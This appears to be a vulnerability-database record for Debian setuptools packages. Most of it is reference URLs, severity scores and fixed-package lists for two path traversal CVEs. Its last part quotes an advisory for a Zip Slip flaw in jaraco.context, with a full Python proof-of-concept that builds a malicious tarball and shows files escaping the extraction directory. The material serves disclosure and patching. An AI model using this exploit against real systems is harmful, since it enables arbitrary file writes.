url	https://access.redhat.com/errata/RHSA-2024:6488

reference_url	https://access.redhat.com/errata/RHSA-2024:6611
reference_id	RHSA-2024:6611
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6611

reference_url	https://access.redhat.com/errata/RHSA-2024:6612
reference_id	RHSA-2024:6612
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6612

reference_url	https://access.redhat.com/errata/RHSA-2024:6661
reference_id	RHSA-2024:6661
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6661

reference_url	https://access.redhat.com/errata/RHSA-2024:6662
reference_id	RHSA-2024:6662
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6662

reference_url	https://access.redhat.com/errata/RHSA-2024:6667
reference_id	RHSA-2024:6667
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6667

reference_url	https://access.redhat.com/errata/RHSA-2024:6726
reference_id	RHSA-2024:6726
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6726

reference_url	https://access.redhat.com/errata/RHSA-2024:6907
reference_id	RHSA-2024:6907
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6907

reference_url	https://access.redhat.com/errata/RHSA-2024:7213
reference_id	RHSA-2024:7213
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:7213

reference_url	https://access.redhat.com/errata/RHSA-2024:7374
reference_id	RHSA-2024:7374
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:7374

reference_url	https://access.redhat.com/errata/RHSA-2024:8168
reference_id	RHSA-2024:8168
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8168

reference_url	https://access.redhat.com/errata/RHSA-2024:8170
reference_id	RHSA-2024:8170
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8170

reference_url	https://access.redhat.com/errata/RHSA-2024:8171
reference_id	RHSA-2024:8171
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8171

reference_url	https://access.redhat.com/errata/RHSA-2024:8172
reference_id	RHSA-2024:8172
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8172

reference_url	https://access.redhat.com/errata/RHSA-2024:8173
reference_id	RHSA-2024:8173
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8173

reference_url	https://access.redhat.com/errata/RHSA-2024:8179
reference_id	RHSA-2024:8179
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:8179

reference_url	https://usn.ubuntu.com/7002-1/
reference_id	USN-7002-1
reference_type
scores
url	https://usn.ubuntu.com/7002-1/

fixed_packages

url	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie

url	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u1%3Fdistro=trixie

url	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u1?distro=trixie
purl	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u1%3Fdistro=trixie

url	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
purl	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie

url	pkg:deb/debian/setuptools@70.3.0-2?distro=trixie
purl	pkg:deb/debian/setuptools@70.3.0-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@70.3.0-2%3Fdistro=trixie

url pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

purl pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-v6y5-h7b6-3qda

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie

aliases CVE-2024-6345, GHSA-cx63-2mw6-8hw5

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qt3x-msd9-tyct

url VCID-uqed-9p12-7bdx

vulnerability_id VCID-uqed-9p12-7bdx

summary setuptools is a package that allows users to download, build, install, upgrade, and uninstall Python packages. A path traversal vulnerability in `PackageIndex` is present in setuptools prior to version 78.1.1. An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to remote code execution depending on the context. Version 78.1.1 fixes the issue.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47273.json

reference_id

reference_type

scores

value	7.1
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47273.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-47273

reference_id

reference_type

scores

value	0.00487
scoring_system	epss
scoring_elements	0.65438
published_at	2026-04-21T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65364
published_at	2026-04-07T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.654
published_at	2026-04-04T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65417
published_at	2026-04-08T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65374
published_at	2026-04-02T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65453
published_at	2026-04-18T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65442
published_at	2026-04-16T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65405
published_at	2026-04-13T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65433
published_at	2026-04-12T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65428
published_at	2026-04-09T12:55:00Z

value	0.00487
scoring_system	epss
scoring_elements	0.65447
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-47273

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47273
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47273

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml

reference_url

https://github.com/pypa/setuptools

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/setuptools

reference_url

https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/

url

https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88

reference_url

https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/

url

https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b

reference_url

https://github.com/pypa/setuptools/issues/4946

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/

url

https://github.com/pypa/setuptools/issues/4946

reference_url

https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-05-19T14:45:34Z/

url

https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf

reference_url

https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-47273

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-47273

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105970
reference_id	1105970
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1105970

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2366982
reference_id	2366982
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2366982

reference_url

https://github.com/advisories/GHSA-5rjg-fvgr-3xxf

reference_id

GHSA-5rjg-fvgr-3xxf

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-5rjg-fvgr-3xxf

reference_url	https://access.redhat.com/errata/RHSA-2025:10407
reference_id	RHSA-2025:10407
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10407

reference_url	https://access.redhat.com/errata/RHSA-2025:10787
reference_id	RHSA-2025:10787
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10787

reference_url	https://access.redhat.com/errata/RHSA-2025:10809
reference_id	RHSA-2025:10809
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10809

reference_url	https://access.redhat.com/errata/RHSA-2025:10992
reference_id	RHSA-2025:10992
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10992

reference_url	https://access.redhat.com/errata/RHSA-2025:11036
reference_id	RHSA-2025:11036
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11036

reference_url	https://access.redhat.com/errata/RHSA-2025:11043
reference_id	RHSA-2025:11043
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11043

reference_url	https://access.redhat.com/errata/RHSA-2025:11044
reference_id	RHSA-2025:11044
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11044

reference_url	https://access.redhat.com/errata/RHSA-2025:11101
reference_id	RHSA-2025:11101
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11101

reference_url	https://access.redhat.com/errata/RHSA-2025:11102
reference_id	RHSA-2025:11102
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11102

reference_url	https://access.redhat.com/errata/RHSA-2025:11146
reference_id	RHSA-2025:11146
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11146

reference_url	https://access.redhat.com/errata/RHSA-2025:11388
reference_id	RHSA-2025:11388
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11388

reference_url	https://access.redhat.com/errata/RHSA-2025:11424
reference_id	RHSA-2025:11424
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11424

reference_url	https://access.redhat.com/errata/RHSA-2025:11425
reference_id	RHSA-2025:11425
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11425

reference_url	https://access.redhat.com/errata/RHSA-2025:11426
reference_id	RHSA-2025:11426
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11426

reference_url	https://access.redhat.com/errata/RHSA-2025:11427
reference_id	RHSA-2025:11427
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11427

reference_url	https://access.redhat.com/errata/RHSA-2025:11463
reference_id	RHSA-2025:11463
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11463

reference_url	https://access.redhat.com/errata/RHSA-2025:11464
reference_id	RHSA-2025:11464
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11464

reference_url	https://access.redhat.com/errata/RHSA-2025:11584
reference_id	RHSA-2025:11584
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11584

reference_url	https://access.redhat.com/errata/RHSA-2025:11607
reference_id	RHSA-2025:11607
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11607

reference_url	https://access.redhat.com/errata/RHSA-2025:11868
reference_id	RHSA-2025:11868
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11868

reference_url	https://access.redhat.com/errata/RHSA-2025:11984
reference_id	RHSA-2025:11984
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:11984

reference_url	https://access.redhat.com/errata/RHSA-2025:12020
reference_id	RHSA-2025:12020
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:12020

reference_url	https://access.redhat.com/errata/RHSA-2025:12834
reference_id	RHSA-2025:12834
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:12834

reference_url	https://access.redhat.com/errata/RHSA-2025:13578
reference_id	RHSA-2025:13578
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13578

reference_url	https://access.redhat.com/errata/RHSA-2025:13668
reference_id	RHSA-2025:13668
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13668

reference_url	https://access.redhat.com/errata/RHSA-2025:13669
reference_id	RHSA-2025:13669
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13669

reference_url	https://access.redhat.com/errata/RHSA-2025:13803
reference_id	RHSA-2025:13803
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13803

reference_url	https://access.redhat.com/errata/RHSA-2025:13804
reference_id	RHSA-2025:13804
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:13804

reference_url	https://access.redhat.com/errata/RHSA-2025:14686
reference_id	RHSA-2025:14686
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:14686

reference_url	https://access.redhat.com/errata/RHSA-2025:14900
reference_id	RHSA-2025:14900
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:14900

reference_url	https://access.redhat.com/errata/RHSA-2025:15408
reference_id	RHSA-2025:15408
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15408

reference_url	https://access.redhat.com/errata/RHSA-2025:15410
reference_id	RHSA-2025:15410
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15410

reference_url	https://access.redhat.com/errata/RHSA-2025:15411
reference_id	RHSA-2025:15411
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15411

reference_url	https://access.redhat.com/errata/RHSA-2025:19421
reference_id	RHSA-2025:19421
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19421

reference_url	https://access.redhat.com/errata/RHSA-2025:19422
reference_id	RHSA-2025:19422
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19422

reference_url	https://access.redhat.com/errata/RHSA-2025:19423
reference_id	RHSA-2025:19423
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19423

reference_url	https://access.redhat.com/errata/RHSA-2025:19424
reference_id	RHSA-2025:19424
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19424

reference_url	https://access.redhat.com/errata/RHSA-2025:19425
reference_id	RHSA-2025:19425
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19425

reference_url	https://access.redhat.com/errata/RHSA-2025:19426
reference_id	RHSA-2025:19426
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19426

reference_url	https://access.redhat.com/errata/RHSA-2025:19427
reference_id	RHSA-2025:19427
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19427

reference_url	https://access.redhat.com/errata/RHSA-2025:19428
reference_id	RHSA-2025:19428
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19428

reference_url	https://access.redhat.com/errata/RHSA-2025:19429
reference_id	RHSA-2025:19429
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19429

reference_url	https://access.redhat.com/errata/RHSA-2025:19430
reference_id	RHSA-2025:19430
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:19430

reference_url	https://access.redhat.com/errata/RHSA-2025:9940
reference_id	RHSA-2025:9940
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:9940

reference_url	https://access.redhat.com/errata/RHSA-2025:9966
reference_id	RHSA-2025:9966
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:9966

reference_url	https://access.redhat.com/errata/RHSA-2026:4215
reference_id	RHSA-2026:4215
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:4215

reference_url	https://usn.ubuntu.com/7544-1/
reference_id	USN-7544-1
reference_type
scores
url	https://usn.ubuntu.com/7544-1/

reference_url	https://usn.ubuntu.com/8010-1/
reference_id	USN-8010-1
reference_type
scores
url	https://usn.ubuntu.com/8010-1/

fixed_packages

url	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie

url	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u2?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u2%3Fdistro=trixie

url	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
purl	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie

url pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

purl pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-v6y5-h7b6-3qda

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie

aliases BIT-setuptools-2025-47273, CVE-2025-47273, GHSA-5rjg-fvgr-3xxf, PYSEC-2025-49

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uqed-9p12-7bdx

url VCID-v6y5-h7b6-3qda

vulnerability_id VCID-v6y5-h7b6-3qda

summary

jaraco.context Has a Path Traversal Vulnerability
### Summary
There is a Zip Slip path traversal vulnerability in the jaraco.context package affecting setuptools as well, in `jaraco.context.tarball()` function. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed.
The strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`.
Note that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`.

The code can be found:
- https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91
- https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 (inherited)

This report was also sent to setuptools maintainers and they asked some questions regarding this.

The lengthy answer is:

The vulnerability seems to be the `strip_first_component` filter function, not the tarball function itself and has the same behavior on any tested Python version locally (from 11 to 14, as I noticed that there is a backports conditional for the tarball).
The stock tarball for Python 3.12+ is considered not vulnerable (until proven otherwise 😄) but here the custom filter seems to overwrite the native filtering and introduces the issue - while overwriting the updated secure Python 3.12+ behavior and giving a false sense of sanitization.

The short answer is:

If we are talking about Python < 3.12 the tarball and jaraco implementations /  behaviors are relatively the same but for Python 3.12+ the jaraco implementation overwrites the native tarball protection.

Sampled tests:
<img width="1634" height="245" alt="image" src="https://github.com/user-attachments/assets/ce6c0de6-bb53-4c2b-818a-d77e28d2fbeb" />

### Details

The flow with setuptools in the mix:
```
setuptools._vendor.jaraco.context.tarball() > req = urlopen(url) > with tarfile.open(fileobj=req, mode='r|*') as tf: > tf.extractall(path=target_dir, filter=strip_first_component) > strip_first_component (Vulnerable)
```

### PoC

This was tested on multiple Python versions > 11 on a Debian GNU 12 (bookworm).
You can run this directly after having all the dependencies:
```py
#!/usr/bin/env python3
import tarfile
import io
import os
import sys
import shutil
import tempfile
from setuptools._vendor.jaraco.context import strip_first_component


def create_malicious_tarball(traversal_to_root: str):
    tar_data = io.BytesIO()
    with tarfile.open(fileobj=tar_data, mode='w') as tar:
        # Create a malicious file path with traversal sequences
        malicious_files = [
            # Attempt 1: Simple traversal to /tmp
            {
                'path': f'dummy_dir/{traversal_to_root}tmp/pwned_by_zipslip.txt',
                'content': b'[ZIPSLIP] File written to /tmp via path traversal!',
                'name': 'pwned_via_tmp'
            },
            # Attempt 2: Try to write to home directory
            {
                'path': f'dummy_dir/{traversal_to_root}home/pwned_home.txt',
                'content': b'[ZIPSLIP] Attempted write to home directory',
                'name': 'pwned_via_home'
            },
            # Attempt 3: Try to write to current directory parent
            {
                'path': 'dummy_dir/../escaped.txt',
                'content': b'[ZIPSLIP] File in parent directory!',
                'name': 'pwned_escaped'
            },
            # Attempt 4: Legitimate file for comparison
            {
                'path': 'dummy_dir/legitimate_file.txt',
                'content': b'This file stays in target directory',
                'name': 'legitimate'
            }
        ]
        for file_info in malicious_files:
            content = file_info['content']
            tarinfo = tarfile.TarInfo(name=file_info['path'])
            tarinfo.size = len(content)
            tar.addfile(tarinfo, io.BytesIO(content))

    tar_data.seek(0)
    return tar_data


def exploit_zipslip():
    print(\"[*] Target: setuptools._vendor.jaraco.context.tarball()\")

    # Create temporary directory for extraction
    temp_base = tempfile.mkdtemp(prefix=\"zipslip_test_\")
    target_dir = os.path.join(temp_base, \"extraction_target\")

    try:
        os.mkdir(target_dir)
        print(f\"[+] Created target extraction directory: {target_dir}\")

        target_dir_abs = os.path.abspath(target_dir)
        print(target_dir_abs)
        depth_to_root = len([p for p in target_dir_abs.split(os.sep) if p])
        traversal_to_root = \"../\" * depth_to_root
        print(f\"[+] Using traversal_to_root prefix: {traversal_to_root!r}\")

        # Create malicious tarball
        print(\"[*] Creating malicious tar archive...\")
        tar_data = create_malicious_tarball(traversal_to_root)

        try:
            with tarfile.open(fileobj=tar_data, mode='r') as tf:
                for member in tf:
                    # Apply the ACTUAL vulnerable function from setuptools
                    processed_member = strip_first_component(member, target_dir)
                    print(f\"[*] Extracting: {member.name:40} -> {processed_member.name}\")

                    # Extract to target directory
                    try:
                        tf.extract(processed_member, path=target_dir)
                        print(f\"    ✓ Extracted successfully\")
                    except (PermissionError, FileNotFoundError, OSError) as e:
                        print(f\"    ! {type(e).__name__}: Path traversal ATTEMPTED\")
        except Exception as e:
            print(f\"[!] Extraction raised exception: {type(e).__name__}: {e}\")

        # Check results
        print(\"[*] Checking for extracted files...\")

        # Check target directory
        print(f\"[*] Files in target directory ({target_dir}):\")
        if os.path.exists(target_dir):
            for root, _, files in os.walk(target_dir):
                level = root.replace(target_dir, '').count(os.sep)
                indent = ' ' * 2 * level
                print(f\"{indent}{os.path.basename(root)}/\")
                subindent = ' ' * 2 * (level + 1)
                for file in files:
                    filepath = os.path.join(root, file)
                    try:
                        with open(filepath, 'r') as f:
                            content = f.read()[:50]
                        print(f\"{subindent}{file}\")
                        print(f\"{subindent}  └─ {content}...\")
                    except:
                        print(f\"{subindent}{file} (binary)\")
        else:
            print(f\"[!] Target directory not found!\")

        print()
        print(\"[*] Checking for traversal attempts...\")
        print()

        # Check if files escaped
        traversal_attempts = [
            (\"/tmp/pwned_by_zipslip.txt\", \"Escape to /tmp\"),
            (os.path.expanduser(\"~/pwned_home.txt\"), \"Escape to home\"),
            (os.path.join(temp_base, \"escaped.txt\"), \"Escape to parent\"),
        ]

        escaped = False
        for check_path, description in traversal_attempts:
            if os.path.exists(check_path):
                print(f\"[+] Path Traversal Confirmed: {description}\")
                print(f\"      File created at: {check_path}\")
                try:
                    with open(check_path, 'r') as f:
                        content = f.read()
                    print(f\"      Content: {content}\")
                    print(f\"      Removing: {check_path}\")
                    os.remove(check_path)
                except Exception as e:
                    print(f\"      Error reading: {e}\")
                escaped = True
            else:
                print(f\"[-] OK: {description} - No escape detected\")

        if escaped:
            print(\"[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!\")
        else:
            print(\"[-] No path traversal detected (mitigation in place)\")

    finally:
        # Cleanup
        print()
        print(f\"[*] Cleaning up: {temp_base}\")
        try:
            shutil.rmtree(temp_base)
        except Exception as e:
            print(f\"[!] Cleanup error: {e}\")


def check_python_version():
    print(f\"[+] Python version: {sys.version}\")
    # Python 3.11.4+ added DEFAULT_FILTER
    if hasattr(tarfile, 'DEFAULT_FILTER'):
        print(\"[+] Python has DEFAULT_FILTER (tarfile security hardening)\")
    else:
        print(\"[!] Python does not have DEFAULT_FILTER (older version)\")
    print()


if __name__ == \"__main__\":
    check_python_version()
    exploit_zipslip()
```

Output:
```
[+] Python version: 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] 
[!] Python does not have DEFAULT_FILTER (older version) 

[*] Target: setuptools._vendor.jaraco.context.tarball() 
[+] Created target extraction directory: /tmp/zipslip_test_tnu3qpd5/extraction_target 
[*] Creating malicious tar archive... 
[*] Extracting: ../../tmp/pwned_by_zipslip.txt           -> ../../tmp/pwned_by_zipslip.txt 
    ✓ Extracted successfully 
[*] Extracting: ../../../../home/pwned_home.txt          -> ../../../../home/pwned_home.txt 
    ! PermissionError: Path traversal ATTEMPTED 
[*] Extracting: ../escaped.txt                           -> ../escaped.txt 
    ✓ Extracted successfully 
[*] Extracting: legitimate_file.txt                      -> legitimate_file.txt 
    ✓ Extracted successfully 
[*] Checking for extracted files... 
[*] Files in target directory (/tmp/zipslip_test_tnu3qpd5/extraction_target): 
extraction_target/ 
  legitimate_file.txt 
    └─ This file stays in target directory... 

[*] Checking for traversal attempts... 

[-] OK: Escape to /tmp - No escape detected 
[-] OK: Escape to home - No escape detected 
[+] Path Traversal Confirmed: Escape to parent 
      File created at: /tmp/zipslip_test_tnu3qpd5/escaped.txt 
      Content: [ZIPSLIP] File in parent directory! 
      Removing: /tmp/zipslip_test_tnu3qpd5/escaped.txt 
[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed! 

[*] Cleaning up: /tmp/zipslip_test_tnu3qpd5
```

### Impact

- Arbitrary file creation in filesystem (HIGH exploitability) - especially if popular packages download tar files remotely and use this package to extract files.
